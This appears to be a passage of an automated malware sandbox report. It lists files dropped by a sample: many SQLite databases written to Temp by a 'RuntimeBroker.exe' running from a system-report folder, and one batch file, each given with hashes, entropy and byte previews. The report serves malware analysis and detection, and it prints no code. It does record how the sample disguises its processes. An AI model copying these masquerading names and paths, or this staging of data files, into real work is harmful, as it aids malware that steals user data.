                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\BVY4CFkbFp

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\BzTFt7rEOR

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\CBbUCpOigx

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Cjf6e2zg5F

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\CwbJ0mVCgt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\DIaXvkH4vv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Db4NCwLatJ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\DkSlZcNwi8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\E4pUVD9HVQ

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\E8fbb1qpUU

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ECIQTzoS5j

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ElYZe8brfu

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\EqCxbtZcYB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ErS3ckHZax

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\F5v0I4Bo7c

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\F9uooRCp5I

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\FGYGf5LPQ8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\FUp0wO39cv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\FXNba8cxgB

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\FlcsZpruRo

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Gnwj3iXpM0

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\H3F4MGeask

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):225
                                                                                  Entropy (8bit):5.143791187184367
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:hCijTg3Nou1SV+DEj5zvIKOZG1N723feU9zK:HTg9uYDEj5jzaW9
                                                                                  MD5:2ECFC9071E254C5EDB6E20ECB0231D7E
                                                                                  SHA1:34E55FD199E5F9F9CCA8F0CDF298A98890D35A2D
